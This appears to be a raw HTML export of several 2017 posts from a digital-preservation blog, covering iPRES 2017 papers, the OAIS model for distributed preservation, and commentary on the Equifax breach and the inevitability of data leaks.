style="text-align: center;"><a href="https://1.bp.blogspot.com/-wCvy56FmBWU/Wd6V3eyyBuI/AAAAAAAAD9U/VM7fCnymsPoeYe93H1nF62jGVvEIw2D4wCLcBGAs/s1600/Rosies.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="321" data-original-width="641" height="100" src="https://1.bp.blogspot.com/-wCvy56FmBWU/Wd6V3eyyBuI/AAAAAAAAD9U/VM7fCnymsPoeYe93H1nF62jGVvEIw2D4wCLcBGAs/s200/Rosies.png" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://ksr-video.imgix.net/projects/934756/video-369162-webm.webm">Rosie's Fine Food</a></td></tr></tbody></table>But I, like many backers, also fund scientific and engineering research, arts projects, even restaurants in return for T-shirts, meal coupons and other <a href="https://en.wikipedia.org/wiki/Tchotchke">tchotchkes</a>. In these others we are not buying an expensive T-shirt; we are supporting research, art, urban recovery and countless other worthy endeavors. 
Because the results are less easily measured, research into this kind of backing is more difficult, and there seems to be little of it.David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com7tag:blogger.com,1999:blog-4503292949532760618.post-32126878007399395852017-10-10T08:00:00.000-07:002017-10-10T08:00:25.334-07:00IPRES 2017<div class="separator" style="clear: both; text-align: center;"></div><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-tsgYDdVVUwU/WdhHGoqiu_I/AAAAAAAAD7M/_hf9w1-fkzcSrHGOOunpA4YSTvGL9guSgCLcBGAs/s1600/JapanRailwayMuseum.JPG" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1200" data-original-width="1600" height="150" src="https://2.bp.blogspot.com/-tsgYDdVVUwU/WdhHGoqiu_I/AAAAAAAAD7M/_hf9w1-fkzcSrHGOOunpA4YSTvGL9guSgCLcBGAs/s200/JapanRailwayMuseum.JPG" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="http://www.kyotorailwaymuseum.jp/en/">Kyoto Railway Museum</a></td></tr></tbody></table>Much as I love Kyoto, now that I'm retired with daily grandparent duties (and no-one to subsidize my travel) I couldn't attend <a href="https://ipres2017.jp/">iPRES 2017</a>.<br /><br />I have now managed to scan both <a href="https://ipres2017.jp/papers/">the papers</a> and the very useful "<a href="https://docs.google.com/document/d/1hqIthCCY4OneY-dnmSKuyvCsHqN5VodKq_Mv3zTSeDQ/mobilebasic">collaborative notes</a>" compiled by Micky Lindlar, Joshua Ng, William Kilbride, Euan Cochrane, Jaye Weatherburn and Rachel Tropea (thanks!). Below the fold I have some notes on the papers that caught my eye. <br /><a name='more'></a><br />I have appreciated the Dutch approach to addressing problems ever since the late 70s, when I worked with Paul ten Hagen and Rens Kessner on the <a href="https://en.wikipedia.org/wiki/Graphical_Kernel_System">Graphical Kernel System standard</a>. This approach featured in two of the papers:<br /><ul><li><a href="https://ipres2017.jp/wp-content/uploads/697e22a42a4e015e46c4aa3eeaae2919.pdf"><i>How the Dutch prepared for certification</i></a> by Barbara Sierman and Kees Waterman describes how six large cultural heritage organizations worked together to ease each of their paths up the hierarchy of repository certification from <a href="https://www.datasealofapproval.org/">DSA</a> to <a href="http://www.nabd.din.ed/cmd?level=tpl-art-detailansicht&amp;committeeid=54738855&amp;artid=147058907&amp;languageid=de">Nestor</a>. The group added two preparatory stages before DSA (Initial Self-Assessment, and Exploratory Phase), comprising activities that I definitely recommend as a starting point. They also translated the DSA and Nestor standards into Dutch, enhanced some of the available tools, and conducted surveys and awareness-raising. </li><li><a href="https://ipres2017.jp/wp-content/uploads/62Joost-van-der-Natshort.pdf"><i>A Dutch approach in constructing a network of nationwide facilities for digital preservation together</i></a> by Joost van der Nat and Marcel Ras reported that:<br /><blockquote>In November&nbsp;2016, the NCDD research on the construction of a cross-domain network of facilities for long-term access to digital Cultural Heritage in the Netherlands was rewarded the Digital Preservation Award 2016 in the category Research and Innovation. 
According to the judges the research report presents an outstanding model to help memory institutes to share facilities and create a distributed, nationwide infrastructure network for Digital Preservation. </blockquote>The NCDD didn't go all-out for either centralization or distribution, but set out to find the optimum balance for infrastructure spanning diverse institutions:<br /><blockquote>Under the motto “Joining forces for our digital memory”, a research project was started in 2014 ... This project had the purpose to find out what level of differentiation between the domains offers the best balance for efficiency. Without collaboration, inefficiencies loom, while individual institutes continue to expand their digital archives and may be reinventing the same wheel over and over again. The project’s objective was and is to avoid duplication of work, and to avoid wasting time, money, and energy. Economies of scale make it easier for the many smaller Dutch institutes to profit from available facilities, services, and expertise as well. Policy makers can now ponder the question “The same for less money, or more for the same money?”. </blockquote></li></ul>I've <a href="http://blog.dshr.org/2016/10/software-heritage-foundation.html">blogged before</a> about the important work of the <a href="http://www.softwareheritage.org/">Software Heritage Foundation</a>. <a href="https://ipres2017.jp/wp-content/uploads/19Roberto-Di-Cosmo.pdf"><i>Software Heritage: Why and How to Preserve Software Source Code</i></a> by Roberto Di Cosmo and Stefano Zacchiroli provides a comprehensive overview of their efforts. I'm happy to see them making two justifications for preserving open-source software that I've been harping on for years:<br /><blockquote>Source code is clearly starting to be recognized as a first class citizen in the area of cultural heritage, as it is a noble form of human production that needs to be preserved, studied, curated, and shared. Source code preservation is also an essential component of a strategy to defend against digital dark age scenarii in which one might lose track of how to make sense of digital data created by software currently in production.</blockquote>But they also provide other important justifications, such as these two:<br /><blockquote>First, Software Heritage intrinsic identifiers can precisely pinpoint specific software versions, independently of the original vendor or intermediate distributor. This <i>de facto</i> provides the equivalent of “part numbers” for FOSS components that can be referenced in quality processes and verified for correctness ....<br /><br />Second, Software Heritage will provide an open provenance knowledge base, keeping track of which software component - at various granularities: from project releases down to individual source files — has been found where on the Internet and when. Such a base can be referenced and augmented with other software-related facts, such as license information, and used by software build tools and processes to cope with current development challenges. 
</blockquote>Considering Software Heritage's relatively short history, the coverage statistics in Section 9 of the paper are very impressive, illustrating the archive-friendly nature of open-source code repositories.<br /><br /><a href="https://mellon.org/Rosenthal-Emulation-2015">Emulation</a> featured in two papers:<br /><ul><li><a href="https://ipres2017.jp/wp-content/uploads/45Euan-Cochrane.pdf"><i>Adding Emulation Functionality to Existing Digital Preservation Infrastructure</i></a> by Euan Cochrane, Jonathan Tilbury and Oleg Stobbe is a short paper describing how Yale University Library (YUL) interfaced bwFLA, Freiburg's emulation-as-a-service infrastructure, to their Preservica digital preservation system. The goal is to implement their policy:<br /><blockquote>YUL will ensure access to hardware and software dependencies of digital objects and emulation or virtualization tools by [...] Preserving, or providing access to preserved software (applications and operating systems), and pre-configured software environments, for use in interacting with digital content that depends on them. </blockquote>Yale is doing important work making Freiburg's emulation infrastructure easy to use in libraries. </li><li><a href="https://ipres2017.jp/wp-content/uploads/30.pdf"><i>Trustworthy and Portable Emulation Platform for Digital Preservation</i></a> by Zahra Tarkhani, Geoffrey Brown and Steven Myers:<br /><blockquote>provides a technological solution to a fundamental problem faced by libraries and archives with respect to digital preservation — how to allow patrons remote access to digital materials while limiting the risk of unauthorized copying. The solution we present allows patrons to execute trusted software on an untrusted platform; the example we explore is a game emulator which provides a convenient prototype to consider many fundamental issues. </blockquote>Their solution depends on <a href="https://software.intel.com/en-us/blogs/2016/06/10/overview-of-intel-software-guard-extensions-instructions-and-data-structures">Intel's SGX instruction set extensions</a>, meaning it will work only on Skylake and future processors. I would expect it to be obsoleted by the processor-independent, if perhaps slightly less bullet-proof, <a href="http://blog.dshr.org/2017/09/web-drm-enables-innovative-business.html">W3C Encrypted Media Extensions</a> (EME) available in all major browsers. Of course, if SGX is available, implementations of EME could use it to render the user even more helpless.</li></ul><a href="https://ipres2017.jp/wp-content/uploads/10David-WilcoxA.pdf"><i>Always on the Move: Transient Software and Data Migrations</i></a> by David Wilcox is a short paper describing the import/export utility developed to ease the data migration between versions 3 and 4 of Fedora. This has similarities with the IMLS-funded WASAPI web archive interoperability work with which the LOCKSS Program is involved. <br /><br />Although they caught my eye, I have omitted here two papers on identifiers. 
I plan a future post about identifiers into which I expect they will fit:<br /><ul><li><a href="https://ipres2017.jp/wp-content/uploads/36Angela-Dappert.pdf"><i>Permanence of the Scholarly Record: Persistent Identification and Digital Preservation – A Roadmap</i></a> by Angela Dappert and Adam Farquhar.</li><li><a href="https://ipres2017.jp/wp-content/uploads/61Remco-van-Veenendaal.pdf"><i>Getting Persistent Identifiers Implemented By ‘Cutting In The Middle-Man’</i></a> by Remco van Veenendaal, Marcel Ras and Marie Claire Dangerfield.</li></ul>David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com0tag:blogger.com,1999:blog-4503292949532760618.post-22264993428189294192017-10-05T08:00:00.002-07:002017-10-11T09:19:25.495-07:00Living With InsecurityMy post <a href="http://blog.dshr.org/2017/10/not-whether-but-when.html"><i>Not Whether But When</i></a> took off from the Equifax breach, attempting to explain why the Platonic ideal of a computer system storing data that is safe against loss or leakage cannot exist in the real world. Below the fold, I try to cover some of the implications of this fact.<br /><a name='more'></a><br />This is the <a href="https://www.bloomberg.com/news/features/2017-09-29/the-equifax-hack-has-all-the-hallmarks-of-state-sponsored-pros">most interesting aspect of the Equifax breach:</a><br /><blockquote class="tr_bq">If the Equifax breach was a purely criminal act, one would expect at least some of the stolen data, especially the credit card numbers that were taken, to have showed up for sale on the black market. That hasn’t happened. ... “This wasn't a credit card play," said one person familiar with the investigation. "This was a 'get as much data as you can on every American’ play.</blockquote>In that way it is similar to the <a href="http://arstechnica.com/security/2015/06/epic-fail-how-opm-hackers-tapped-the-mother-lode-of-espionage-data/">hack of the Office of Personnel Management</a>, the <a href="http://krebsonsecurity.com/2015/02/anthem-breach-may-have-started-in-april-2014/">hack of health insurers including Anthem</a>, and others. What are the bad guys interested in?<br /><br />First, like the OPM hack, they are looking for <a href="https://www.bloomberg.com/news/features/2017-09-29/the-equifax-hack-has-all-the-hallmarks-of-state-sponsored-pros">information on specific individuals</a> they think can be recruited, blackmailed or defrauded:<br /><blockquote class="tr_bq">Besides amassing data on nearly every American adult, the hackers also sought information on specific people. It's not clear exactly why, but there are at least two possibilities: They were looking for high-net-worth individuals&nbsp;to defraud, or they wanted the financial details of people with potential intelligence value.</blockquote>Second, they are stockpiling ammunition for a possible cyber Armageddon. Remember how during 2014 the <a href="https://isc.sans.edu/forums/diary/Linksys+Worm+TheMoon+Summary+What+we+know+so+far/17633/1">Moon Worm</a> was crawling the Internet looking for vulnerable home routers, and then at Christmas the network of home routers was used to DDOS the <a href="http://krebsonsecurity.com/2014/12/cowards-attack-sony-playstation-microsoft-xbox-networks/">gaming networks of Microsoft's Xbox and Sony's Playstation</a>? And how, a year ago, a similar process of stealthy resource accumulation and sudden attack allowed the <a href="http://blog.dshr.org/2016/10/updates-on-dyn-ddos.html">Mirai botnet</a> to take down a major DNS provider? 
Mirai was the work of just <a href="https://krebsonsecurity.com/2016/10/spreading-the-ddos-disease-and-selling-the-cure/">a couple of guys</a>, and it was not the worst they could have done. As I wrote in <a href="http://blog.dshr.org/2016/10/you-were-warned.html"><i>You Were Warned</i></a>:<br /><blockquote class="tr_bq">A more sophisticated tool than Mirai that used known vulnerabilities (such as the <a href="https://www.akamai.com/us/en/about/news/press/2016-press/akamai-threat-research-team-identifies-openssh-vulnerability.jsp">12-year-old SSH bug</a>) could create a botnet with say 20% of the IoT, a 100 exabit/sec DDoS capability. With the <a href="https://www.shodan.io/">Shodan search engine</a>, the source for Mirai and a set of known vulnerabilities, this is within the capability of ordinarily competent programmers. It could almost certainly take the entire Internet down.</blockquote>Major criminal organizations, let alone nation states, have vastly greater resources than the Mirai guys. It is safe to assume that they have stockpiled the cyber equivalent of nuclear weapons, meaning that there are many actors out there capable at short notice of having much more severe impacts than the inability to tweet that Mirai caused.<br /><br />For example, impacts on the financial system. Having your individual credit and ATM cards stop working is annoying. Having <i>everyone's</i> cards stop working <i>simultaneously</i> crashes the economy. Cards stopping working, as happened last June in Ukraine, would be just the start. Ben Sullivan's <a href="http://www.institutionalinvestor.com/article/3751923/banking-and-capital-markets-banking/a-hackers-guide-to-destroying-the-global-economy.html"><i>A Hacker’s Guide to Destroying the Global Economy</i></a> is based on 2015's <a href="https://www.theregister.co.uk/2015/11/19/resilient_shield/">Operation Resilient Shield</a>. Sullivan <a href="http://www.institutionalinvestor.com/article/3751923/banking-and-capital-markets-banking/a-hackers-guide-to-destroying-the-global-economy.html">writes</a>:<br /><blockquote class="tr_bq">cyberforces representing the U.S. and the U.K. commenced a joint exercise, the culmination of more than eight months of meticulous planning. Government and independent cybersecurity researchers, working alongside leading global financial firms, simulated their worst-case cyber scenario: a large-scale, coordinated attack on the financial sectors of the Western world’s biggest economies</blockquote>Sullivan <a href="http://www.institutionalinvestor.com/article/3751923/banking-and-capital-markets-banking/a-hackers-guide-to-destroying-the-global-economy.html">points out that</a>:<br /><blockquote class="tr_bq">Banks and financial institutions are not strangers to cyberattacks. A March 2017 report commissioned by Accenture found that a typical financial services organization will face an average of 85 targeted breach attempts every year, a staggering third of which will be successful. “Financial institutions across the world are a constant target for attackers, from nation-state hackers looking to cause disruption to old-fashioned criminals looking to steal vast sums of money,” says Lee Munson, a security researcher at Comparitech.</blockquote>These are individual, uncoordinated attacks, and one in three succeeds. 
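Taking the Accenture figures at face value, the implied tempo is worth spelling out; this is pure arithmetic on the two numbers in the quote:<br />
<pre>
# What "85 targeted breach attempts a year, a third successful" implies
# for a typical financial institution. Arithmetic on the quoted figures.

attempts_per_year = 85
success_rate = 1.0 / 3.0

successes = attempts_per_year * success_rate
print(f"expected successful breaches per year: {successes:.1f}")
print(f"i.e. one success roughly every {365 / successes:.1f} days")

# Probability of getting through a whole year without a single success.
p_clean_year = (1.0 - success_rate) ** attempts_per_year
print(f"P(clean year): {p_clean_year:.2e}")
</pre>
A successful targeted breach roughly every two weeks per institution, and a vanishingly small chance of a clean year.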
Resilient Shield war-gamed a coordinated attack of the kind <a href="http://www.institutionalinvestor.com/article/3751923/banking-and-capital-markets-banking/a-hackers-guide-to-destroying-the-global-economy.html">Sullivan leads his piece with</a>:<br /><blockquote class="tr_bq">Overnight, unknown attackers had hijacked the websites and online customer portals of every single bank in the country. From the outside, nothing seemed amiss. In reality, a cyberheist on an unprecedented scale was underway.<br /><br />The attackers were stealing login credentials from unsuspecting customers who thought they were visiting their banks’ websites but were in fact being redirected to bogus reproductions thanks to the hackers’ modification of the banks’ Domain Name System registrations. ... The attackers weren't just pilfering login credentials, though. Customers were infected with data-stealing malware from the hijacked bank websites, while the attackers simultaneously redirected the information of all ATM withdrawals and point-of-sale platforms to their own systems, hoovering up even more credit card information on the nation’s unsuspecting citizens.<br />...<br />The worst was yet to come. It wasn’t long before the issues at the stock exchange started. ... Rapid fluctuations started destabilizing the entire country’s economy within minutes; billions were wiped off the region’s largest companies’ market valuations. ... The lines stretched for blocks, but the ATMs were empty. ... This was all in the first four hours. The money stopped for two weeks. The effects could last a lifetime.</blockquote>Kim Zetter at <i>The Intercept</i> has a readable overview of the <a href="https://theintercept.com/2017/10/04/masquerading-hackers-are-forcing-a-rethink-of-how-attacks-are-traced/">increasing difficulty of figuring out who is behind attacks like this, or "attributing" them</a>:<br /><blockquote>The growing propensity of government hackers to reuse code and computers from rival nations is undermining the integrity of hacking investigations and calling into question how online attacks are attributed, according to researchers from Kaspersky Lab.</blockquote>This is a <a href="https://theintercept.com/2017/10/04/masquerading-hackers-are-forcing-a-rethink-of-how-attacks-are-traced/">big problem</a>:<br /><blockquote>Though copying techniques is common for the NSA, two former NSA hackers tell The Intercept they never saw the agency re-use actual code during their time there and say they doubt the agency would conduct a false flag operation.<br /><br />“When we catch foreign-actor tools we’ll steal the techniques themselves,” one of the sources told The Intercept. But “there are a host of issues when you falsely attribute … you could start a war that way.</blockquote>Or even start a war with a correct attribution. But if you can't be <i>sure</i> whether the attack originates from Eastasia or is really some skilled Freedonians masquerading as Eastasian so that Eastasia gets nuked but Freedonia doesn't get the blame, what can you do? Nuke them both? Do nothing?<br /><br />The reason we still have an Internet and a banking system is MAD (Mutually Assured Destruction) or, looked at another way, that no-one wants to kill the goose that is laying so many golden eggs. 
<a href="http://www.institutionalinvestor.com/article/3751923/banking-and-capital-markets-banking/a-hackers-guide-to-destroying-the-global-economy.html">Sullivan writes</a>:<br /><blockquote class="tr_bq">Between them, McGregor and Truppi have investigated dozens of cyberattacks against U.S. financial institutions, and they say that working out why a bank might have been attacked often leads to discovering who attacked it, and how. “A good example: China is not going to hack United States infrastructure and take down the trading platform, because that would affect them economically,” says Truppi. “What China would try to do is hack banking institutions and gain the upper hand with information, maybe information on mergers and acquisitions or other information on companies.”<br /><br />On the other hand, Truppi says, attacks like those purportedly deployed by North Korea on South Korea are designed to wreak havoc on society. “The reason they have been able to take those destructive approaches is because they’re not economically entwined with the U.S. in any way, shape, or form. It’s making a statement,” he says.</blockquote>I'm skeptical that North Korea's decision makers would want to crash the world's, or even the US' economy. Little if any of what distinguishes their lifestyle from that of the North Korean in the street originates in North Korea.<br /><br />This is another way in which the nuclear analogy in Maciej Cegłowski's <a href="http://idlewords.com/talks/haunted_by_data.htm"><i>Haunted by Data</i></a> can be considered. Stockpiling digital ammunition is like hoarding nuclear weapons hoping that by doing so you never have to use them. But the analogy breaks down along two axes:<br /><ul><li>Nuclear weapons are so expensive to create that only nation-states have them (we hope). But cyber-nukes are cheap enough that we face the equivalent of Raven, the character in <a href="https://en.wikipedia.org/wiki/Snow_Crash">Neal Stephenson's <i>Snow Crash</i></a> who has a nuke in the sidecar of his Harley, and POOR IMPULSE CONTROL tattooed across his forehead.</li><li>For high-yield nuclear weapons the attribution problem is addressed by satellites and radar that track the missiles from close to their launch. But cyber-nukes are more like the <a href="https://en.wikipedia.org/wiki/Suitcase_nuclear_device">suitcase nuclear devices</a> developed by both the US and the USSR. The idea was to smuggle the devices onto the enemy's territory where they could be detonated with no warning. During the Cold War attribution was trivial, based on the assumption that the combatants retained control of their nukes. But this may <a href="https://en.wikipedia.org/wiki/Suitcase_nuclear_device">no longer be the case</a>:<br /><blockquote class="tr_bq">Former Russian National Security Adviser <a href="https://en.wikipedia.org/wiki/Aleksandr_Lebed">Aleksandr Lebed</a> in an interview with <a href="https://en.wikipedia.org/wiki/CBS" title="CBS">CBS</a> newsmagazine <i><a href="https://en.wikipedia.org/wiki/Sixty_Minutes">Sixty Minutes</a></i> on 7 September 1997 claimed that the Russian military had lost track of more than a hundred out of a total of 250 "suitcase-sized nuclear bombs".</blockquote></li></ul>An environment of rampant proliferation and obscure attribution is, to say the least, destabilizing. 
This is particularly true of <a href="https://en.wikipedia.org/wiki/Asymmetric_warfare">asymmetric warfare</a> where the cost of the attack is vastly less than the cost of an effective defense (think <a href="https://en.wikipedia.org/wiki/Improvised_explosive_device">IEDs</a>). This is almost always the case in cyberspace, which is why cyber-crime is so profitable. For example, <a href="http://blog.dshr.org/2015/06/alphaville-on-bitcoin.html">two years ago I wrote</a>:<br /><blockquote class="tr_bq">An attacker with zero-day exploits for each of the three major operating systems on which blockchain software runs could use them to take over the blockchain. There is a <a href="http://www.wired.com/2015/04/therealdeal-zero-day-exploits/" rel="nofollow">market for zero-day exploits</a>, so we know how much it would cost to take over the blockchain. Good operating system zero-days are reputed to sell for $250-500K each, so it would cost about $1.5M to control the Bitcoin blockchain, currently representing nearly $3.3B in capital. That's 220,000% leverage! Goldman Sachs, eat your heart out. </blockquote>What to do? In <a href="http://idlewords.com/talks/haunted_by_data.htm"><i>Haunted by Data</i></a> Maciej Cegłowski makes three recommendations:<br /><blockquote>Don't collect it!<br /><br />If you can get away with it, just don't collect it! Just like you don't worry about getting mugged if you don't have any money, your problems with data disappear if you stop collecting it.<br />...<br />If you have to collect it, don't store it!<br /><br />Instead of stocks and data mining, think in terms of sampling and flows. "Sampling and flows" even sounds cooler. It sounds like hip-hop!<br /><br />If you have to store it, don't keep it!<br /><br />Certainly don't keep it forever. Don't sell it to <a href="http://www.itworld.com/article/2710610/it-management/acxiom-exposed--a-peek-inside-one-of-the-world-s-largest-data-brokers.html">Acxiom</a>! Don't put it in Amazon glacier and forget it.</blockquote>I have a different view. People tend to think that security is binary: a system either is or is not secure. But we see that in practice no system, <a href="https://en.wikipedia.org/wiki/The_Shadow_Brokers">not even the NSA's</a>, is secure. We need to switch to a scalar view: systems are more or less secure. Or, rather, treat security breaches like radioactive decay, events that happen randomly with a probability per unit time that is a characteristic of the system. More secure systems have a lower probability of breach per unit time. Or, looked at another way, data leakage is characterized by a half-life, the time after which there is a 50% probability that the data will have leaked. Data that is deleted long before its half-life has expired is unlikely to leak, but it could. (For example, data with a ten-year half-life that is deleted after one year still has a 1 - 0.5<sup>1/10</sup>, or roughly 7%, chance of having leaked first.) Data kept forever is certain to leak. These leaks need to be planned for, not regarded as exceptions.David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com9tag:blogger.com,1999:blog-4503292949532760618.post-31389513555730147592017-10-04T08:00:00.000-07:002017-10-08T17:15:51.638-07:00OAIS & Distributed Digital PreservationOne of the lessons from the <a href="http://blog.dshr.org/2014/08/trac-audit-lessons.html">TRAC audit of the CLOCKSS Archive</a> was the mis-match between the OAIS model and distributed digital preservation:<br /><blockquote class="tr_bq"><b>CLOCKSS has a centralized organization but a distributed implementation</b>.
Efforts are under way to reconcile the completely centralized OAIS model with the <a href="http://purl.pt/24107/1/iPres2013_PDF/Creating%20a%20Framework%20for%20Applying%20OAIS%20to%20Distributed%20Digital%20Preservation.pdf">reality of distributed digital preservation</a>, as in collaborations such as the <a href="http://www.metaarchive.org/">MetaArchive</a> and between the <a href="http://www.kb.dk/en/">Royal and University Library</a> in Copenhagen and the <a href="http://library.au.dk/en/">library of the University of Aarhus</a>. Although the organization of the CLOCKSS Archive is centralized, serious digital archives like CLOCKSS require a distributed implementation, if only to achieve geographic redundancy. The OAIS model fails to deal with distribution even at the implementation level, let alone at the organizational level.</blockquote>It is appropriate on the <a href="http://blog.dshr.org/2013/10/it-was-fifteen-years-ago-today.html">19<sup>th</sup> anniversary of the LOCKSS Program</a> to point to <a href="https://vimeo.com/233024801">a 38-minute video about this issue</a>, posted last month. In it Eld Zierau lays out the Outer OAIS - Inner OAIS model that she and Nancy McGovern have developed to resolve the mis-match, and <a href="https://digitalbevaring.dk/wp-content/uploads/2014/12/Zierau_McGovern_Outer_Inter_OAIS.pdf">published at iPRES 2014</a>.<br /><br />They apply OAIS hierarchically, first to the distributed preservation network as a whole (outer), and then to each node in the network (inner). This can be useful in delineating the functions of nodes as opposed to the network as a whole, and in identifying the single points of failure created by centralized functions of the network as a whole.<br /><br />While I'm promoting videos, I should also point to <a href="http://arquivo.pt/">Arquivo.pt</a>'s excellent video for a general audience about the <a href="https://youtu.be/YVqFey7hVJc">importance of Web archiving</a>, with subtitles in English.David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com0tag:blogger.com,1999:blog-4503292949532760618.post-63078069159667885722017-10-03T08:00:00.004-07:002017-10-03T08:00:18.380-07:00Not Whether But WhenRichard Smith, the CEO of Equifax while the company leaked personal information on most Americans (and suffered <a href="https://krebsonsecurity.com/2017/05/fraudsters-exploited-lax-security-at-equifaxs-talx-payroll-division/">at least one more leak</a> that was active for about a year up to last March), was held accountable for these failings by being allowed to <a href="http://fortune.com/2017/09/26/equifax-ceo-richard-smith-net-worth/">retire with a mere $90M</a>.
But at <i>Fortune</i>, John Patrick Pullen quotes him as <a href="http://fortune.com/2017/09/29/equifax-ceo-hack-worry/">uttering an uncomfortable truth</a>:<br /><blockquote class="tr_bq">"There's those companies that have been breached and know it, and there are those companies that have been breached and don't know it,"</blockquote>Pullen <a href="http://fortune.com/2017/09/29/equifax-ceo-hack-worry/">points out that</a>:<br /><blockquote class="tr_bq">The speech, given by Smith to students and faculty at the university's Terry College of Business, <a href="https://www.youtube.com/watch?v=lZzqUnQg-Us">covered a lot of ground</a>, but it frequently returned to security issues that kept the former CEO awake at night—foremost among them was the company's large database.</blockquote><a href="http://fortune.com/2017/09/29/equifax-ceo-hack-worry/">Smith should have been losing sleep</a>:<br /><blockquote class="tr_bq">Though it was still 21 days before his company would reveal that it had been massively hacked, Equifax, at that time, had been breached and knew it.</blockquote>Two years ago, the amazing Maciej Cegłowski gave one of his <a href="https://boingboing.net/2015/10/05/botwars-vs-ad-tech-the-origin.html">barn-burning speeches</a>, entitled <a href="http://idlewords.com/talks/haunted_by_data.htm"><i>Haunted by Data</i></a> (my emphasis):<br /><blockquote class="tr_bq">imagine data not as a pristine resource, but as a waste product, a bunch of radioactive, toxic sludge that we don’t know how to handle. In particular, I'd like to draw a parallel between what we're doing and nuclear energy, another technology whose beneficial uses we could never quite untangle from the harmful ones. A singular problem of nuclear power is that it generated deadly waste whose lifespan was far longer than the institutions we could build to guard it. Nuclear waste remains dangerous for many thousands of years. This oddity led to extreme solutions like 'put it all in a mountain' and 'put a scary sculpture on top of it' so that people don't dig it up and eat it. <b>But we never did find a solution. We just keep this stuff in swimming pools or sitting around in barrels</b>.</blockquote>The fact is that, just like nuclear waste, <b>we have never found a solution to the interconnected problems of keeping data stored in real-world computer systems safe from attack and safe from leaking</b>. It isn't a question of <i>whether</i> the bad guys will get in to the swimming pools and barrels of data, and exfiltrate it. It is simply <i>when</i> they will do so, and how long it will take you to find out that they have. Below the fold I look at the explanation for this fact. I'll get to the implications of our inability to maintain security in a subsequent post.<br /><a name='more'></a><br />To summarize the explanation, it is that real-world computer systems are embedded in real-world organizations. 
It might be possible to build a system that was secure when embedded in an ideal organization, but it definitely isn't possible to build a system that remains secure when embedded in a real-world organization.<br /><br />At Bloomberg, Michael Riley, Jordan Robertson, and Anita Sharpe have a detailed report on the <a href="https://www.bloomberg.com/news/features/2017-09-29/the-equifax-hack-has-all-the-hallmarks-of-state-sponsored-pros">organizational background to the Equifax leak</a> of personal information on most Americans, and the earlier problem that <a href="https://krebsonsecurity.com/2017/05/fraudsters-exploited-lax-security-at-equifaxs-talx-payroll-division/">allowed the bad guys to file fake tax returns and claim large refunds</a>. They report that initially, CEO Smith considered security a priority <a href="https://www.bloomberg.com/news/features/2017-09-29/the-equifax-hack-has-all-the-hallmarks-of-state-sponsored-pros">but it didn't last</a>:<br /><blockquote class="tr_bq">Not long after becoming CEO, he hired Tony Spinelli, a well-regarded cyber expert, to overhaul the company's security. ... Apparently, gaps remained. After the breach became public in September, Steve VanWieren, a vice president of data quality who left Equifax in January 2012 after almost 15 years, wrote in a post on LinkedIn that "it bothered me how much access just about any employee had to the personally identifiable attributes. ... Spinelli left in 2013, followed less than a year later by his top deputy, Nick Nedostup. Many rank and file followed them out the door, and key positions were filled by people who were not well-known in the clubby cybersecurity industry.</blockquote>Smith's replacement for Spinelli was:<br /><blockquote>Susan Mauldin, a former security chief at First Data Corp., to run the global security team. Mauldin introduced herself to colleagues as a card-carrying member of the National Rifle Association, according to a person familiar with the changes.</blockquote>That alone should have disqualified her; it shows that in her personal life she preferred the security theater of waving a big gun around to the data showing that <a href="https://dx.doi.org/10.1056/NEJM199310073291506">gun-owners are a bigger threat to their family</a> than to the bad guys. She wasn't effective at making security a priority:<br /><blockquote>“Internally, security was viewed as a bottleneck,” one person said. “There was a lot of pressure to get things done. Anything related to IT was supposed to go through security." ... But one former security leader said he finally joined the talent exodus because it felt like he was working with the “B&nbsp;team.”</blockquote>That's because he <i>was</i> on the B team. Given the incentives facing a CEO, the A team at the company will always be the one boosting the bottom line this quarter, the pervasive effect of short-termism. At Equifax CEO Smith had things he needed to get done:<br /><blockquote class="tr_bq">Smith acquired two dozen companies that have given Equifax new ways to package and sell data, while expanding operations to 25 countries and 10,000 employees. Business was good—the company’s stock price quadrupled under Smith’s watch,</blockquote>All two dozen companies had incompatible systems that needed to be integrated into Equifax's by the end of the next quarter so that the stock continued to rise. 
While, of course, ensuring that these external systems contained no vulnerabilities, that none were introduced during the integration, and that none of the new employees posed an insider threat. In at least one case, this process clearly failed. <a href="https://krebsonsecurity.com/2017/09/ayuda-help-equifax-has-my-data/">Brian Krebs reported that</a>:<br /><blockquote class="tr_bq">an online portal designed to let Equifax employees in Argentina manage credit report disputes from consumers in that country <i>was wide open, protected by perhaps the most easy-to-guess password combination ever: “admin/admin.”</i><br />...<br />Once inside the portal, the researchers found they could view the names of more than 100 Equifax employees in Argentina, as well as their employee ID and email address. The “list of users” page also featured a clickable button that anyone authenticated with the “admin/admin” username and password could use to add, modify or delete user accounts on the system. ...<br /><br />Each employee record included a company username in plain text, and a corresponding password that was obfuscated by a series of dots.<br /><br />However, all one needed to do in order to view said password was to right-click on the employee’s profile page and select “view source,” a function that displays the raw HTML code which makes up the Web site. Buried in that HTML code was the employee’s password in plain text.<br /><br />A review of those accounts shows all employee passwords were the same as each user’s username. Worse still, each employee’s username appears to be nothing more than their last name, or a combination of their first initial and last name. In other words, if you knew an Equifax Argentina employee’s last name, you also could work out their password for this credit dispute portal quite easily.</blockquote>It wasn't just employees' information that was at risk:<br /><blockquote>From the main page of the Equifax.com.ar employee portal was a listing of some 715 pages worth of complaints and disputes filed by Argentinians who had at one point over the past decade contacted Equifax via fax, phone or email to dispute issues with their credit reports. The site also lists each person’s <a href="javascript:void(0)" target="_blank">DNI</a> — the Argentinian equivalent of the Social Security number — again, in plain text. All told, this section of the employee portal included more than 14,000 such records.</blockquote>Clearly no-one at the C-level in Equifax was going to give priority to the security of some penny-ante dispute resolution portal in Argentina. But it is very likely that, had it been the bad guys snooping around, they would have found links from this system to others on Equifax's network, and been able to get in this way too.<br /><br />The Argentinian dispute resolvers needed to get their work done. They didn't have the resources to pay a top-flight developer to build a system for them, the more so because dispute resolution doesn't fatten the bottom line. So they kludged something together and, not being security gurus, made lots of 